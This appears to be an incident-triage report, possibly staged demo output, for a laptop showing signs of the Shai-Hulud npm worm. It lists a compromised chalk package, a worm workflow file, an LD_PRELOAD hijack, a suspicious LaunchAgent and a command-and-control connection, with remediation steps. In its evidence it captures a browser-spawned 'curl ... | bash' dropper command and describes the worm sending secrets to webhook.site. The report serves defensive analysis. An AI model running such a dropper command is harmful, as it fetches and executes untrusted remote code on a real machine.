Executive summary critical

demo-laptop has converging evidence of active compromise. A lockfile in /Users/analyst/code/frontend pins chalk@5.6.1, a known-bad version of the Shai-Hulud npm worm campaign, and the worm's signature workflow file (shai-hulud-workflow.yml) is present alongside it. A bash process spawned by Chrome is curl-piping a remote script into a shell. Outbound traffic from that shell terminates at 185.220.101.46, an IP currently listed in abuse.ch ThreatFox. LD_PRELOAD is set to a path under /tmp, which would inject an attacker-controlled library into every newly-launched process. A LaunchAgent references a binary under /Users/Shared/.cache/. Either the host has been compromised, or this is an extremely well-staged false positive.

Top actions

If compromised: Treat as a confirmed worm-driven supply-chain compromise. Assume credential theft has occurred. Rotate every secret in scope before reconnecting to the network.

Attribution hint: Shai-Hulud npm worm (community-attributed; multi-actor)

artifacts: 7
findings: 7
critical: 3
high: 3
medium: 0
low: 0
info: 1
criticalLive ThreatFox IP match: 185.220.101.46c2
MITRE T1071

Established connection to 185.220.101.46:443 matches a live ThreatFox indicator. Treat as confirmed command-and-control infrastructure.

Evidence

{
  "ip": "185.220.101.46",
  "raddr": [
    "185.220.101.46",
    443
  ]
}
criticalShai-Hulud compromised package: chalk@5.6.1shai_hulud
MITRE T1195.002

Project /Users/analyst/code/frontend has compromised npm package chalk@5.6.1 in its lockfile. This package version is listed as part of the Shai-Hulud npm worm campaign. Treat the host as potentially compromised: rotate tokens, audit recent `npm publish` activity, and inspect for the worm workflow file.

AI triage

confirmed_malicious (confidence , reassessed severity critical)

chalk@5.6.1 lockfile entry matches the Shai-Hulud worm; rotate tokens immediately

Observed: package-lock.json pins chalk@5.6.1, a version on the Shai-Hulud compromised-package list (multiple corroborating sources: Aikido, StepSecurity, Socket.dev). Inferred: any `npm install` that ran in this project may have executed the worm's post-install script, which exfiltrates env-var secrets to webhook.site and attempts to self-propagate by publishing malicious versions of the user's own packages.

Next steps

  • Immediately revoke the user's NPM_TOKEN and any GitHub PATs accessible from this shell session.
  • Audit recent `npm publish` activity on the user's account at https://www.npmjs.com/settings/<user>/packages.
  • Inspect for the worm-installed `.github/workflows/shai-hulud-workflow.yml` — see the next finding.
  • Delete node_modules, remove the compromised version from package-lock.json, re-run `npm install --ignore-scripts`.
  • Run `trufflehog` against the affected repo to find any leaked credentials.

Attribution hint: Shai-Hulud npm worm campaign (multi-actor, first wave Sep 2025)

Evidence

{
  "package": "chalk@5.6.1",
  "project": "/Users/analyst/code/frontend"
}
criticalShai-Hulud worm workflow artifact: /Users/analyst/code/frontend/.github/workflows/shai-hulud-workflow.ymlshai_hulud
MITRE T1199

GitHub Actions workflow file matches the worm's filename signature and references the canonical webhook.site exfil endpoint. This is the self-propagation vehicle of the Shai-Hulud worm.

Evidence

{
  "bad_name": true,
  "markers": [
    "shai-hulud",
    "webhook.site"
  ],
  "path": "/Users/analyst/code/frontend/.github/workflows/shai-hulud-workflow.yml"
}
highLD_PRELOAD set in environmentenv_hijack
MITRE T1574.006

LD_PRELOAD is set to '/tmp/.X11-unix/.libtelemetry.so'. This forces the dynamic linker to load an attacker-controlled library into every spawned process. Almost never legitimate on user desktops.

Evidence

{
  "value": "/tmp/.X11-unix/.libtelemetry.so",
  "var": "LD_PRELOAD"
}
highPersistence entry references /Users/Shared/.cache/persistence_outlier
MITRE T1543.001

LaunchAgent com.example.helper executes /Users/Shared/.cache/helper as a daemon. Persistence entries should not reference world-shared scratch space.

Evidence

{
  "match": "/Users/Shared/",
  "subject": "launchd:/Users/analyst/Library/LaunchAgents/com.example.helper.plist"
}
highShell (bash) spawned by browser (Google Chrome)suspicious_processes
MITRE T1059

PID 2204 (bash) was spawned by browser process Google Chrome. Browsers should not parent shells; this is characteristic of post-exploitation via a malicious extension or compromised renderer.

AI triage

likely_malicious (confidence , reassessed severity high)

Chrome→bash with curl|bash pattern strongly suggests post-exploitation through a renderer or extension

Observed: bash process with parent PID 1487 (Google Chrome) and a command line that pipes a remote-downloaded shell script directly into bash. Browsers do not legitimately spawn interactive shells; the curl|bash pattern is a textbook dropper. Inferred: post-exploitation via a malicious extension or a compromised renderer tab. Source reliability is high (deterministic OS API); information credibility is moderate pending corroboration with browser-extension audit.

Next steps

  • Preserve volatile state: `lsof -p 2204`, `proc info 2204`, and `kill -STOP 2204` (do not kill yet).
  • Audit installed Chrome extensions: chrome://extensions/ and `chrome --enable-logging --vmodule=*extension*=2`.
  • Pull the install.sh from the captured URL in a sandbox and inspect.
  • Run `digger loki scan` to cross-check against signature-base IOCs.
  • Rotate any tokens that were in env vars on this shell (see env_hijack finding).

Evidence

{
  "cmdline": "/bin/bash -c 'curl -fsSL https://wbn.example.io/install.sh | bash'",
  "pid": 2204,
  "ppid": 1487
}
infoExternal connection to 185.220.101.46:443network_anomaly
MITRE T1071

Established connection to public address 185.220.101.46:443 from PID 2204 (bash).

Evidence

{
  "pid": 2204,
  "raddr": [
    "185.220.101.46",
    443
  ]
}